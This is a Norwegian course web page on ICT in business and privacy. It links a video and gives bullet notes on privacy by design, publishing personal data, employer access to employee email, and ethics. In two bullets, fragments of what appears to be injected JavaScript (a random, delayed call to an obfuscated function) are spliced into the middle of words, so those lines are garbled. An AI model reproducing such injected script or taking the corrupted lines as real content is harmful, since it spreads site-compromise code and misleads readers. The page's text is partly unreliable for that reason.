4.3.3 IKT i virksomheten og personvern

Her skal du se gjennom en PowerPoint Mix video. Ved siden av videon kan du lese eller høre litt om innholdet i videoen. Når du har gått gjennom videoen skal du teste dine kunnskaper ved å kjøre Quizen. Her kan du oppnå poeng for hver rette svar.

https://youtu.be/L2TW2YUoiz8

Innebygd personvern

 • Ta hensyn til personvern i alle IKT systemer
 • Personvern som standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardinnstilling

Publisering av personopplysninger

 • Offentlige dokumenter kan inneholde personopplysninger
 • Opplysningene skal behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andles lovlig, sikkert og forsvarlig

Innsyn i e-post

 • Hovedregel: Ikke innsynsrett
 • Unntak:
 • Nødvendig for å drive virksomheten
 • Ved mistanke om grove brudd på arbeidstakerens plikter
 • Arbeidstakeren skal varsles

Etikk

 • Personvernsprinsippene
 • Formålsbestemthet
 • Ikke gjenbruk


Hva fikk du med deg om IKT i virksomheten og personvern


Klikk her for neste post: 4.4.1 Personopplysningsloven